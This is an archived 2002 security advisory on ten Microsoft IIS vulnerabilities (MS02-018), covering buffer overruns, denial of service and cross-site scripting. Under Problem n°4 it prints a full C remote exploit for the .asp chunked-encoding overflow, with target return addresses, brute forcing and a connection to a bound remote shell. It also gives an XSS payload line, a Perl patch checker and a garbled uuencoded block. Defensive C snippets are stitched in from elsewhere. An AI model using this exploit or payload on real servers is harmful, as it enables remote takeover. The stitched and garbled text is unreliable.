26th Sep 2002 [SBWID-5257]
COMMAND
IIS multiple buffer overflow and cross site scripting
SYSTEMS AFFECTED
IIS 4.0, 5.0, 5.1, 6.0: all releases and patched versions up to 11 April
2002
PROBLEM
Editor's note
=============
In this huge advisory Microsoft discloses up to 10 different
vulnerabilities affecting all releases of IIS, for which a summary
table is provided below. At least one of those (.htr remote overflow
that could lead to remote access of the server) was discovered by an
independent research group [http://www.atstake.com] in February 2002,
undisclosed until today ...
See: [http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms02-018.asp]
Additional note (24 June 2002): can you see a similarity between bugs
n°2/3 and the recent posts about Apache?
Summary of vulnerabilities / IIS versions
=========================================
Note :
====
IIS 6.0 is not present here: since it is considered a beta version,
Microsoft will not disclose bug details for it. I.e.: you should NOT use
a .NET platform in a production environment ...
                                                                | IIS | IIS | IIS |
                                                                | 4.0 | 5.0 | 5.1 |
----------------------------------------------------------------+-----+-----+-----+
Buffer overrun in Chunked Encoding mechanism                    | Yes | Yes | No  |
Microsoft-discovered variant of Chunked Encoding buffer overrun | Yes | Yes | Yes |
Buffer Overrun in HTTP Header handling                          | Yes | Yes | Yes |
Buffer Overrun in ASP Server-Side Include Function              | Yes | Yes | Yes |
Buffer overrun in HTR ISAPI extension                           | Yes | Yes | No  |
Access violation in URL error handling                          | Yes | Yes | Yes |
Denial of service via FTP status request                        | Yes | Yes | Yes |
Cross-site Scripting in IIS Help File search                    | No  | Yes | Yes |
Cross-site Scripting in HTTP Error Page                         | Yes | Yes | Yes |
Cross-site Scripting in Redirect Response message               | Yes | Yes | Yes |
Problem n°1
===========
Buffer overrun in Chunked Encoding mechanism
A buffer overrun vulnerability involving the operation of the chunked
encoding transfer mechanism via Active Server Pages in IIS 4.0 and 5.0.
An attacker who exploited this vulnerability could overrun heap memory
on the system, with the result of either causing the IIS service to
fail or allowing code to be run on the server.
See report by eEye [http://www.eeye.com] in file provided below.
Update (06 May 2002)
======
The UUencoded archive (reports.zip.uue) below has been updated with an
exploit for this bug provided by CHINANSL Security Team
[http://www.chinansl.com]
Problem n°2
===========
Microsoft-discovered variant of Chunked Encoding buffer overrun
This one is related to the preceding one, but lies elsewhere
within the ASP data transfer mechanism. It could be exploited in a
similar manner as the preceding vulnerability, and would have the same
scope. However, it affects IIS 4.0, 5.0, and 5.1.
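A defensive illustration for Problems n°1 and n°2, added here and not taken from the advisory, Microsoft or eEye: a strict validator for a chunked request body that rejects oversized or inconsistent chunk-size declarations before any data is copied. The function names, status codes and the two size limits are assumptions made for this example, and the sample bodies in main() are constructed.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Policy limits: assumptions for this example, not values taken from IIS. */
#define MAX_CHUNK_SIZE (64u * 1024u)
#define MAX_BODY_SIZE  (1024u * 1024u)

enum chunk_status {
    CHUNK_OK = 0,
    CHUNK_BAD_SIZE_LINE,   /* no hex digits, or size line not ended by CRLF */
    CHUNK_TOO_LARGE,       /* declared chunk size above MAX_CHUNK_SIZE */
    CHUNK_TRUNCATED,       /* declared size exceeds the bytes actually received */
    CHUNK_BAD_TERMINATOR,  /* chunk data not followed by CRLF */
    CHUNK_BODY_TOO_LARGE,  /* sum of chunk sizes above MAX_BODY_SIZE */
    CHUNK_NO_LAST_CHUNK    /* input ended without a terminating 0-size chunk */
};

static int hex_val(unsigned char c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Parse "<hex-size>[;extension]CRLF" starting at buf[*pos]. */
static enum chunk_status parse_size_line(const unsigned char *buf, size_t len,
                                         size_t *pos, size_t *size_out)
{
    size_t i = *pos, size = 0;
    int digits = 0, v;

    while (i < len && (v = hex_val(buf[i])) >= 0) {
        /* Refuse before shifting, so the accumulator can never wrap around. */
        if (size > (MAX_CHUNK_SIZE >> 4))
            return CHUNK_TOO_LARGE;
        size = (size << 4) | (size_t)v;
        digits++;
        i++;
    }
    if (digits == 0) return CHUNK_BAD_SIZE_LINE;
    if (size > MAX_CHUNK_SIZE) return CHUNK_TOO_LARGE;
    if (i < len && buf[i] == ';')            /* skip an optional chunk extension */
        while (i < len && buf[i] != '\r') i++;
    if (len - i < 2 || buf[i] != '\r' || buf[i + 1] != '\n')
        return CHUNK_BAD_SIZE_LINE;
    *pos = i + 2;
    *size_out = size;
    return CHUNK_OK;
}

/* Walk the whole body; on CHUNK_OK, *body_len is the decoded length. */
enum chunk_status validate_chunked_body(const unsigned char *buf, size_t len,
                                        size_t *body_len)
{
    size_t pos = 0, total = 0, size;
    enum chunk_status st;

    for (;;) {
        if (pos >= len) return CHUNK_NO_LAST_CHUNK;
        st = parse_size_line(buf, len, &pos, &size);
        if (st != CHUNK_OK) return st;
        if (size == 0) {                     /* last chunk (trailers not supported) */
            if (len - pos < 2 || buf[pos] != '\r' || buf[pos + 1] != '\n')
                return CHUNK_NO_LAST_CHUNK;
            *body_len = total;
            return CHUNK_OK;
        }
        /* Compare against the remaining bytes; never compute pos + size first. */
        if (size > len - pos || len - pos - size < 2) return CHUNK_TRUNCATED;
        if (buf[pos + size] != '\r' || buf[pos + size + 1] != '\n')
            return CHUNK_BAD_TERMINATOR;
        if (size > MAX_BODY_SIZE - total) return CHUNK_BODY_TOO_LARGE;
        total += size;
        pos += size + 2;
    }
}

/* Convenience wrapper for NUL-terminated test bodies. */
enum chunk_status validate_chunked_cstr(const char *s, size_t *body_len)
{
    return validate_chunked_body((const unsigned char *)s, strlen(s), body_len);
}

int main(void)
{
    /* Constructed sample bodies. */
    const char *samples[] = {
        "5\r\nhello\r\n0\r\n\r\n",                 /* well formed */
        "A\r\nabcdefgh\r\n4\r\nwxyz\r\n0\r\n\r\n", /* size does not match data */
        "FFFFFFFF\r\nx\r\n0\r\n\r\n",              /* absurd declared size */
        "10\r\nshort\r\n0\r\n\r\n"                 /* declares more than was sent */
    };
    size_t i, n;
    for (i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        n = 0;
        printf("sample %u -> status %d, body %u bytes\n", (unsigned)i,
               (int)validate_chunked_cstr(samples[i], &n), (unsigned)n);
    }
    return 0;
}
```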
Problem n°3
===========
Buffer Overrun in HTTP header handling
A buffer overrun involving how IIS 4.0, 5.0 and 5.1 process HTTP header
information in certain cases. IIS performs a safety check prior to
parsing the fields in HTTP headers, to ensure that expected delimiter
fields are present and in reasonable places. However, it is possible to
spoof the check, and convince IIS that the delimiters are present even
when they are not. This flaw could enable an attacker to create a URL
whose HTTP header field values would overrun a buffer used to process
them.
Credit goes to Entrust [http://www.entrust.com].
Problem n°4
===========
Buffer Overrun in ASP Server-Side Include Function
A Microsoft-discovered buffer overrun vulnerability in IIS 4.0, 5.0 and
5.1 that results from an error in a safety check that is performed during
server-side includes. In some cases, a user request for a web page is
properly processed by including the file into an ASP script and
processing it. Prior to processing the include request, IIS performs an
operation on the user-specified file name, designed to ensure that the
file name is valid and sized appropriately to fit in a static buffer.
However, in some cases it could be possible to provide a bogus,
extremely long file name in a way that would pass the safety check,
thereby resulting in a buffer overrun.
Exploit : (24 June 2002)
=========
/*
* DDK - 2k2 -
*
*
* coded by NeMeS||y tnx to Birdack
*
*
*/
// IIS 4(NT4) - IIS 5(2K) .asp bof
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <sys/time.h>
#include <sys/wait.h>
#include <errno.h>
#include <unistd.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <limits.h>
#include <netdb.h>
#include <arpa/inet.h>
#define RET_BRUTE_START 0x00400000
#define RET_BRUTE_STOP 0x00500000
#define PORT_BIND 7788
#define VERSION "0.3b"
unsigned char wincode[] =
    ""; /* payload bytes not reproduced here */
struct{
int def;
char *descr;
unsigned int ret;
unsigned int rewrite;
int port;
char path[256];
}target[] = {
{0, " IIS5 Windows 2000 by hsj", 0x0045C560, 0x77eaf44c, 80, "/iisstart.asp"},
{1, " IIS5 Windows 2000 Chinese SP0 - SP1", 0x0045C560, 0x77ec044c, 80, "/iisstart.asp"},
{2, " IIS5 Windows 2000 Chinese SP2", 0x0045C560, 0x77ebf44c, 80, "/iisstart.asp"},
{3, " IIS5 Windows 2000 English SP2", 0x0045C560, 0x77edf44c, 80, "/iisstart.asp"},
{4, " IIS4 Windows NT4", 0, 0, 80, "/iisstart.asp"},
{666, NULL, 0, 0, 0, NULL}
};
int sel = 0;
int resolve (char *IP);
int make_connection(char *address,int port);
int open_back(char *host,int port);
void l33thax0r(int sock);
void usage(char *name);
int main(int argc, char **argv)
{
int i, j, cnt, sock;
int brute = 0;
unsigned int step;
unsigned char *shell_port_offset;
char buf[8192], buf2[16384], host[1024];
unsigned int ret_start, ret_stop, ret_step, ret_1;
fprintf(stderr, "\n IIS4(NT4) - IIS5(2K) .asp buffer overflow remote exploit "
"- DDK Crew 2k2 - (version "VERSION")\n"
" by NeMeS||y and Birdack\n\n");
if(argc == 1) usage(argv[0]);
while((cnt = getopt(argc,argv,"h:t:p:f:b:")) != EOF)
{
switch(cnt)
{
case 'h':
strncpy(host, optarg, sizeof(host));
host[sizeof(host) - 1] = '\x00';
break;
case 't':
sel = atoi(optarg);
break;
case 'p':
sscanf(optarg, "%p", &target[sel].port);
break;
case 'f':
strncpy(target[sel].path, optarg, sizeof(&target[sel].path));
target[sel].path[sizeof(&target[sel].path) -1] = '\x00';
break;
case 'b':
brute = 1;
step = atoi(optarg);
break;
default:
usage(argv[0]);
break;
}
}
if(target[sel].def == 4) brute = 1; // ;>
sock = make_connection(host,target[sel].port);
if(sock<0)
{
printf("Error -> [ %d ] not connected.\n\n",sock);
return -3;
}
if(brute==0)
{
ret_start = target[sel].ret;
ret_step = 1;
ret_stop = target[sel].ret;
} else {
ret_start = RET_BRUTE_START;
ret_step = step;
ret_stop = RET_BRUTE_STOP;
}
printf("\n [+] Start\n\n host\t->\t%s\n port\t->\t%d\n path\t->\t%s\n type\t->\t%s\n\n\n",
host, target[sel].port, target[sel].path, target[sel].descr);
if(brute==1) printf("\n [+] Brute forcing enabled... do u have time?\n\n");
for(ret_1 = ret_start; ret_1 <= ret_stop; ret_1 += ret_step)
{
for(i=0;i<sizeof(buf)-strlen(wincode)-12-1;)
{
buf[i++] = 0xeb;
buf[i++] = 0x06;
}
*(unsigned int *)&buf[i] = 0x41414141;
*(unsigned int *)&buf[i+4] = 0x41414141;
*(unsigned int *)&buf[i+8] = 0x41414141;
memcpy(&buf[sizeof(buf)-strlen(wincode)-1],wincode,strlen(wincode));
buf[sizeof(buf)-1] = 0;
sprintf(buf2,"POST %s?%s HTTP/1.0\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n"
"Transfer-Encoding: chunked\r\n\r\n"
"10\r\nDDKDDKDDKDDKDD\r\n"
"4\r\nRETT\r\n"
"4\r\nREWR\r\n"
"0\r\n\r\n\r\n",
&target[sel].path,buf);
*(unsigned int *)strstr(buf2,"REWR") = &target[sel].rewrite;
*(unsigned int *)strstr(buf2,"RETT") = ret_1;
if(brute==0) printf(" # Sending buffer to socket : ");
write(sock,buf2,strlen(buf2));
fprintf(stderr, " [+] ret : 0x%08lx ->",ret_1);
sleep(3);
if(brute==0) printf("DONE!\n\n");
shutdown(sock,2);
close(sock);
printf(" # connecting to our shell - port : [ %d ]\n",PORT_BIND);
sock=open_back(host,PORT_BIND);
if(sock==-1 && brute==0)
{
printf("\n [-] FAILED ");
printf("exiting now!\n\n");
exit(-1);
}
if(sock!=-1)
{
printf("\n\n[+] Address guessed!! \n\n");
printf("...OH oH OH... done! our evilcode has worked baby at [ %d ]\n", ret_1);
l33thax0r(sock);
exit(0);
}
}
}
int resolve (char *IP)
{
struct hostent *info;
unsigned long ip;
if ((ip=inet_addr(IP))==-1)
{
if ((info=gethostbyname(IP))==0)
{
printf("Couldnt resolve [%s]\n", IP);
exit(0);
}
memcpy(&ip, (info->h_addr), 4);
}
return (ip);
}
int make_connection(char *address,int port)
{
struct sockaddr_in server,target;
int s,i,bf;
fd_set wd;
struct timeval tv;
s = socket(AF_INET,SOCK_STREAM,0);
if(s<0)
return -1;
memset((char *)&server,0,sizeof(server));
server.sin_family = AF_INET;
server.sin_addr.s_addr = htonl(INADDR_ANY);
server.sin_port = 0;
target.sin_family = AF_INET;
target.sin_addr.s_addr = resolve(address);
if(target.sin_addr.s_addr==0)
{
close(s);
return -2;
}
target.sin_port = htons(port);
bf = 1;
ioctl(s,FIONBIO,&bf);
tv.tv_sec = 10;
tv.tv_usec = 0;
FD_ZERO(&wd);
FD_SET(s,&wd);
connect(s,(struct sockaddr *)&target,sizeof(target));
if((i=select(s+1,0,&wd,0,&tv))==(-1))
{
close(s);
return -3;
}
if(i==0)
{
close(s);
return -4;
}
i = sizeof(int);
getsockopt(s,SOL_SOCKET,SO_ERROR,&bf,&i);
if((bf!=0)||(i!=sizeof(int)))
{
close(s);
errno = bf;
return -5;
}
ioctl(s,FIONBIO,&bf);
return s;
}
int open_back(char *host,int port)
{
int sock, err;
struct sockaddr_in server_addr;
struct hostent *he;
he=gethostbyname(host);
if (he == NULL) return -1;
server_addr.sin_family = AF_INET;
server_addr.sin_port = htons (port);
server_addr.sin_addr.s_addr = resolve(host);
sock=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (sock == -1) return -1;
err = connect(sock, (struct sockaddr *)&server_addr, sizeof(server_addr));
if (err == -1) sock = -1;
return sock;
}
void l33thax0r(int sock)
{
char buf[1024];
fd_set rset;
int i;
while (1)
{
FD_ZERO(&rset);
FD_SET(sock,&rset);
FD_SET(STDIN_FILENO,&rset);
select(sock+1,&rset,NULL,NULL,NULL);
if (FD_ISSET(sock,&rset))
{
i=read(sock,buf,1024);
if (i <= 0)
{
printf("Fuck... the connection was closed!\n");
printf("exiting...\n\n");
exit(0);
}
buf[i]=0;
puts(buf);
}
if (FD_ISSET(STDIN_FILENO,&rset))
{
i=read(STDIN_FILENO,buf,1024);
if (i>0)
{
buf[i]=0;
write(sock,buf,i);
}
}
}
}
void usage(char *name)
{
int j = 0;
printf("Usage: %s <-h hostname> <-t target> [-p port] [-f path file] [-b step]\n", name);
printf("\nOptions:\n"
" -h hostname (www.iisvictim.com)\n"
" -t target\n"
" -p port (default 80)\n"
" -f path_file (default /iisstart.asp)\n"
" -b step (brute force, try step 2000)\n\n"
"Available targets:\n\n");
while(target[j].def != 666)
{
printf(" %d ] - %s -\n", target[j].def, target[j].descr);
j++;
}
printf("\n");
exit(1);
}
Problem n°5
===========
Buffer overrun in HTR ISAPI extension
A buffer overrun affecting the HTR ISAPI extension in IIS 4.0 and 5.0.
By sending a series of specially malformed HTR requests, it could be
possible to either cause the IIS service to fail or, under a very
difficult operational scenario, to cause code to run on the server.
See report by @Stake [http://www.atstake.com] in file provided below.
Microsoft IIS .HTR heap overflow checker by Filip Maertens
[http://filip.compsec.be] (added 25 April 2002) :
#!/usr/bin/perl
########################################################################
# (c) Filip Maertens/CISSP, .HTR Heap Overflow checker.
#
# DISCLAIMER: This tool is only to be used for legitimate purposes only.
# This is considered as an intrusive, so please adhere to the laws and
# regulations applicable in your country. Oh, and honey, there is pizza
# in the fridge...
#
# CREDITS: @stake/KPMG for the advisory
#          Thor Larholm for the patch identification remark
#
########################################################################
use Socket;

print "iischeck.pl | Microsoft .HTR Heap Overflow Checker | <filip\@securax.be>\n-----------------------------------------------------------------------\n";

# Command line: iischeck [hostname] -method [method]
# $ARGV[0] is the hostname, $ARGV[2] the index into @requestmethod.
$host   = $ARGV[0];
$method = $ARGV[2] || 0;    # defaults to GET when no method index is given
my $target = inet_aton($host);
$port = 80;

$requestmethod[0] = "GET";
$requestmethod[1] = "HEAD";
$requestmethod[2] = "POST";

# Initializing strings & vars
# The 404 page returned for a bogus URL differs between patched and
# unpatched servers; these strings tell the two versions apart.
$patchedstring    = "InsertElementAnchor";
$nonpatchedstring = "document.write";
$bogusurl         = "/xxxiischeckxxx";

# Main loop of rotten code
if ($host ne "") {
    print " -- Checking hostname: $host\n";
    $rawrequest = "$requestmethod[$method] $bogusurl HTTP/1.1\nClient-Agent:iischeck.pl\nHost:$host\r\n\r\n";
    @results = sendrequestandgetanswer($rawrequest);
    $criticalline = $results[49]; # 49, since HTTP headers are included
    # $results[0] is an empty placeholder, so $results[2] is the first
    # response header after the status line (the Server banner on IIS).
    if ($results[2] =~ "IIS") {
        SWITCH: {
            if ($criticalline =~ $nonpatchedstring) { $patched = " -- Status: System vulnerable."; last SWITCH; }
            if ($criticalline =~ $patchedstring)    { $patched = " -- Status: System MS02-18 patched."; last SWITCH; }
            $patched = " -- Status: Cannot identify patch level";
        }
        print "$patched\n\n";
    } else {
        print " -- Error: System is not a Windows/IIS host.\n\n";
    }
} else {
    showusage();
}
exit(0);

#######: Functions used by iischeck.pl :#######
sub showusage
{
    print "Usage: iischeck [hostname] -method [method]\n";
}

sub sendrequestandgetanswer
{
    my ($rawrequest) = @_;
    @lines = sendrawandgetanswer($rawrequest);
    return @lines;
}

# Send the raw request and return every line of the response.
sub sendrawandgetanswer
{
    my ($pstr) = @_;
    socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp') || 0) || die(" -- Error in creating socket\n");
    if (connect(S, pack "SnA4x8", 2, $port, $target))
    {
        my @in = ("");   # leading empty element: response lines start at index 1
        select(S);
        $| = 1;
        print $pstr;
        # Read until the server closes the connection: the check above
        # needs line 49 of the response, well past the end of the headers.
        while (<S>)
        {
            push @in, $_;
        }
        select(STDOUT);
        return @in;
    }
    else
    {
        die(" -- Error connecting to: $host\n");
    }
}

# Send the raw request without reading the response (not called above).
sub sendraw
{
    my ($pstr) = @_;
    socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp') || 0) || die("Socket problems\n");
    if (connect(S, pack "SnA4x8", 2, $port, $target))
    {
        my @in = ("");
        select(S);
        $| = 1;
        print $pstr;
    }
    else
    {
        die("connect problems\n");
    }
}
Problem n°6
===========
Access violation in URL error handling
A denial of service vulnerability involving the way IIS 4.0, 5.0, and
5.1 handle an error condition from ISAPI filters. At least one ISAPI
filter (which ships as part of FrontPage Server Extensions and
ASP.NET), and possibly others, generate an error when a request is
received containing a URL that exceeds the maximum length set by the
filter. In processing this error, the filter replaces the URL with a
null value. A flaw results because IIS attempts to process the URL in
the course of sending the error message back to the requester,
resulting in an access violation that causes the IIS service to fail.
Peter Gründl of KPMG Denmark added:
Frontpage contains URL parsers for dynamic components (shtml.exe/dll).
If a malicious user issues a request for /_vti_bin/shtml.exe where the
URL for the dynamic contents is replaced with a long URL, the submodule
will filter out the URL, and return a null value to the web service URL
parser. An example string would be 35K of ascii 300. This will cause an
access violation and Inetinfo.exe will be shut down. Due to the nature
of the crash, we do not feel that it is exploitable beyond the point of
a Denial of Service.
See report by @Stake [http://www.atstake.com] in file provided below.
Problem n°7
===========
Denial of service via FTP Status request
A denial of service vulnerability involving the way the FTP service in
IIS 4.0, 5.0 and 5.1 handles a request for the status of the current
FTP session. If an attacker were able to establish an FTP session with
an affected server, and levied a status request that created a
particular error condition, a flaw in the FTP code would prevent it
from correctly reporting the error. Other code within the FTP service
would then attempt to use uninitialized data, with an access violation
as the result. This would result in the disruption of not only FTP
services, but also of web services.
Problem n°8,9,10
================
Cross-site Scripting in IIS Help File search facility, HTTP Error Page, and Redirect Response message
A trio of Cross-Site Scripting (CSS) vulnerabilities affecting IIS 4.0,
5.0 and 5.1: one involving the results page that’s returned when
searching the IIS Help Files, one involving HTTP error pages; and one
involving the error message that’s returned to advise that a requested
URL has been redirected. All of these vulnerabilities have the same
scope and effect: an attacker who was able to lure a user into clicking
a link on his web site could relay a request containing script to a
third-party web site running IIS, thereby causing the third-party
site’s response (still including the script) to be sent to the user.
The script would then render using the security settings of the
third-party site rather than the attacker’s.
See report by Joe Smith and zenomorph [http://www.cgisecurity.com] for
Help File search CSS in file provided below.
Credit goes to Keigo Yamazaki of the LAC SNS Team
[http://www.lac.co.jp/security/] for redirect response message CSS :
When a request is submitted to IIS, it returns a "302 Object Moved"
error message to the client without changing the metacharacters
contained in the request. This occurs when the request contains the
following URI:
GET /existing directory name?"><script>alert("aaa"); </script>
See report by Thor Larholm of Jubii A/S [http://www.jubii.dk/] for HTTP
Error page CSS in file provided below.
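The redirect-response case described above, as an added example that is not part of the advisory or of IIS: the body of a "302 Object Moved" page built once with the request URI copied in unchanged and once with its metacharacters HTML-escaped into a bounded buffer. The function names, the page markup and the sample URI are assumptions made for this illustration.

```c
#include <stdio.h>
#include <string.h>

/* Constructed sample, modelled on the request URI quoted in the advisory. */
#define SAMPLE_URI "/docs?\"><script>alert(\"aaa\"); </script>"

/* Page template (assumed markup): the requested URI lands inside an attribute. */
#define BODY_FMT \
    "<head><title>Document Moved</title></head>\n" \
    "<body><h1>Object Moved</h1>This document may be found " \
    "<a href=\"%s\">here</a></body>\n"

/*
 * HTML-escape src into dst (capacity cap, including the NUL).
 * Returns the escaped length, or -1 if the result would not fit; the
 * output is never truncated silently.
 */
int html_escape(char *dst, size_t cap, const char *src)
{
    size_t o = 0, n;

    if (cap == 0) return -1;
    for (; *src; src++) {
        char one[2] = { *src, '\0' };
        const char *rep;

        switch (*src) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        default:   rep = one;      break;
        }
        n = strlen(rep);
        if (cap - o <= n) return -1;   /* need room for rep plus the NUL */
        memcpy(dst + o, rep, n);
        o += n;
    }
    dst[o] = '\0';
    return (int)o;
}

/* Behaviour described in the advisory: metacharacters are passed through. */
int build_redirect_body_unsafe(char *out, size_t cap, const char *uri)
{
    int n = snprintf(out, cap, BODY_FMT, uri);
    return (n < 0 || (size_t)n >= cap) ? -1 : n;
}

/* Hardened form: escape first, and fail closed if anything does not fit. */
int build_redirect_body(char *out, size_t cap, const char *uri)
{
    char esc[1024];
    int n;

    if (html_escape(esc, sizeof esc, uri) < 0) return -1;
    n = snprintf(out, cap, BODY_FMT, esc);
    return (n < 0 || (size_t)n >= cap) ? -1 : n;
}

int main(void)
{
    char out[2048];

    if (build_redirect_body_unsafe(out, sizeof out, SAMPLE_URI) > 0)
        printf("unescaped:\n%s\n", out);
    if (build_redirect_body(out, sizeof out, SAMPLE_URI) > 0)
        printf("escaped:\n%s\n", out);
    return 0;
}
```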
UUEncoded file
M[_M"IJ'X<#,2Y^?7HG]\_5%<J456*/%+&44J%Y?W*H^2;-7M1'FV$&_$0N;!
MSTJM53_`]^W>>WP7[V4<1;DJ>CO=#OW[]']:H=NY4HF26HD36:@WW8[O[^$'
M1(9T\UIA9%RL<>,LOIN+;4LGR$(EU(,*RB+.4G!P_NGX_9?WQ^_.SC^<BH]Y
M?!\GZDZ)"\Q/F-!:%VJAQ3'6#PH5@N#[.,@SG46%<*Q_N!&COB_.TT+EJ2KP
M(<KRA:0EQ+7*[^-`:1KQU%P6^^698YK9[9PH'>3QDNZ]H>_'XKY,4I7+69Q`
M5!&GHI@K0:AM'P=%?*^8![*.^4WA'GU\<?ST44)UC,$TDF0Q6*V;K;"54D
MRZ006%0F"2N`%-%B41M2VN*QG9=I&J=WI*D=3P0R%3/5[:B'99+%P$D4F<@9
M\V1M`;?H9Q&("UD4,OBJ<BV">08I^^(&O!LVDECI;F<5%W,K4J@PDQ8CKF+"
M:@D#,BB!'$$F0EE(K!@HR$U2P?B2.(BS$J0"4$P+W1>_K+%<F7X5*K44Z[DK
MQ5+@0J#8_B!!!I%7L",E1B!9$%O$?CZ+BUSF6`,2XA>Q6A'1Y7*9K/NDH9MY
MK`5^I`"=-4%(_&RHC612IVN:>`<U%1HBRT+(<!&GL<8Z199CW3C5!2F'\*BM
MB!>+(?!2%L%<2"UT1EK48IEI'<\291D!MED"SR&9U8-<+!,%MD%/S[,5$W5<
M):2G-(P)W;X0G^RX$JXF:U/I2[W$HG"51($/&4$IPO%('#QI/0P4%NMV$GBM
M+O@ZM`]*P5?-K)X:YMZ8X/"Z]?I%W<7D%Y`L2U]OO+J=CY?7-V(OCC6XR`OF
M\.SFYN/>H#^`MP2!6A9OQ.L]C#S+-#ZZR-3MO,M@5&FQ>[->JC="$J8!F]?>
MP^YJM=HE*]DM\X3-1H4`-)>I1D3:/;6&],88%MWK=@;PUX_')ZV?;F<$%SZ^
M.38?3J]O$+.ZG3\5F?/GQH>V5*>PCF<$)I'!B0KF*;A-Q&9\(*4[56M#0L@9
M3!IV#FUJZUI&G^J!X*$A<QAD`EW!_*W?VGC>=,@DF0-"R!PGL+T\0YC29"QS
ME;Y,ED($$R6O6+&)&/O*EIAJ[0,NLP!!6)<U@Y.+BS,HMW_ZGZ=B5QS7^A$J
MS[/<R$K6EY<!7X8#^0^3213,]@\G"`M0%70'/[$>R_?'H_'^:#P:T0H?LH+L
MD%VOOD/.2^+,U0.((.AH:*F*.[V;Z].3GB>RW#B03$I@U2/=]B@:P[T+8*_@
M3":P(+";.->4QZ+'2^5K\D\@'V3+-9&"O?3HNR&*`*98=[1>#HEU^D,A.$"Q
MWSXEG(<`T^W(@->XC[/$LA\$)8(O!1_BW2!7YD!H0V7$T/;UZ=F.U7^W0^.1
M\;Y2QDI@2P@\T&9<,+&OT*7!S-B&M90^M%[9B3/.("\?"$=6.&Y"A`4'?Y?*
M(AD41B7TS05;U0C+Q!-B<IF;\(O`54C8@3A3<HE*(X4)+:`R*!#)+J_%U!ZM
M0?,"JB%FBL0$L'!?I(YC1$K(I8C*]DY?7"]5$$?D9,G:H^!:\4`UA3$0HN]Q
M$@$/>89`O<K@.+0$90[$\Q#+DMM9/XJ-+>CF+0FE2JVS():40^MPN<R6I=4<
MH4PF`."2+/LJ=8RDFB!3:)M#XQR>20OO-A<&;_,8*8(T2$RYR`#H'9P(@90X
MC=5YG+A2-]VHX4XA/<$V8Y/@F36M*%T\7E!H@YJBE&T!,OED+A **SULI-
M8A7/;!I%O#":KMU@74UEAV$8`7@-I8<"PB3T96G0,`D<(JU7QGE29U&5A3TV
MV;E$ZEVZLE"3T,;PB@RR<'Z7E%8U5-(N&*(R-:%HF7'%0AQI><]HU'&JNODX
M4FH.+&"7K`5).]$V/%&XA$?3LG;5RN1(_709ME$5N50P96SJ2[FFHJ]?Z6"F
M%*QA09%<EQPAHC(A8&P99PQNU@9;/ADLNAV7-YSZL]1&%J1V8'52*FLR#;=V
MY1(92:4ZBC!4`"%B([[email protected];!QN6CX%N2=2F$%J1G:0)"KTV'=6E*,0K<*,
MHX#!DT<P2`ND<S;:/`-\J7)^PYH";V&,(K-(U@96"RE7MAS7S@NJJ$J8$99-
M,ZZ$65*8EC+FW"[_U`,)X"(>[WFX3O>HVEH@N4M4@0MR1ET0H[GZKS+.C?_!
M'4UD=*4NWZ6Z"C?G<6%\JE'8.:/4S61>K]E'Y"O`/39,5-J949RX8+OE;!%S
M$8'D++\J0@[[K]A4"B$\*>5B]2DA/9NOH%($'_H,U\-"H2;B7(Z099G]05UW
M`,)U9A,4U^GW,H])CF['971,ZV/3Q$-,;5,5MXKC.<RU5;)&1@W0"+NVJ9C,
MPE5<-O=#A1!E$&"$[%[J#\L#HFU5[=!]J)ZW5TOL4,&K=MF.!+.NL$F!TP6'
M?-(-^3'G=LK7F=WHFMU!8_O$,=Y`60NDR4>=F!"!=R_L0PEOEINL1$^QP1;N
MM.IV#H_URAL\F"N54E7B;ILS1*T9X=T`!Q&3]"]BK,#AAB>;;59S/N5^W@M!
M.2*,=4`XF`1"PY=2%PBCR'!J):G.L/O!O.3B-E2%,F'5[5+#C'R05$%W!)>Q
MQ'3M%,QUW[0,4!$IXJA=8?YJ5V-3K7=>&/B2O]LMIS"67=,>](?],?-MS)7T
MJ/FNK;(?8]HW>::-\ZH-T&S-`#%V*`;AKS;@(!B8H)VJ%>U"M:U=:XXH5*@$
MAE3F[)EQH1U@'-<KS8"/#+L]F2-Q9F#[/M:PEGE1+-_L[6&7U'?[J;V*."'T
M!^I?('>-;%+J5ON$E)R;+@[Y*<-`LLU*1&NPS3#QQA;3&NLL'`5>K*`-D"KV
MW/0]-WWO_;4_W/4'4_(3XN0=D(H+T#JQP*W?B"N@M!9GR#**<L5I,_%=H:J0
M.59OCV*VKM;(.!]5OE!S(OU;KFC).Q(0*+F-^E)E'(OF)D?'J4F"[&F<')W(
MV`B5<+.U01:9C'.M:8+@9IK=2V[HY)8EBM2HGVQ"S95Q*5*_QZNQ1GD9PPJ9
M_$+>Q4&[+_`.VXP\OIL78CO8$8/#P^DN==",'9W$=T`B,:8")K&GA;PF!U`^
MHC@$N[O#5IC,/K+;(`(9HL2STNV3"E,FJ;Q`_$A@5WF6FF(:L;L@4N2DD`4N
M1!HR#H_*!U9NFBM(Q523<%T!(&D7!L*@!CY!(Q+KK,1`/3=M)Q1LJ<F,P`+X
MFSH*II07;7[L.G52"N-R0?`G96B*+L>MO>>)I>DZJMV%C!-#Y6=F@UJ<$>U%
MEQ5*C#$96R)1PE;;U+K%5V5AV@#));$@J44ETSM5"9[RUK0O?M=5T*5V4$V%
M$"GBPFRJN<TA*4"30BB?L(SB^!HYOMG9N:E3\H=+()V3'F.7]'-U)W-;Y%,3
MJUZ.\VV*)'U/6M!S9^NR!+LYEUM);*H-BWLH%Z::0&75FL6QLTE')&LFH
M=T3,I3:`FWT=D>6M#G9N4#[J+*>]%C_'6*.LP6DA3)JV=1"&Y#^@+EVE`JM_
M9>7\JE0X0X$*VS9ZA6F%KA-'><L3Y3*D7I4I'J'D!<?U(N/6Q#..T@R*IZ[)
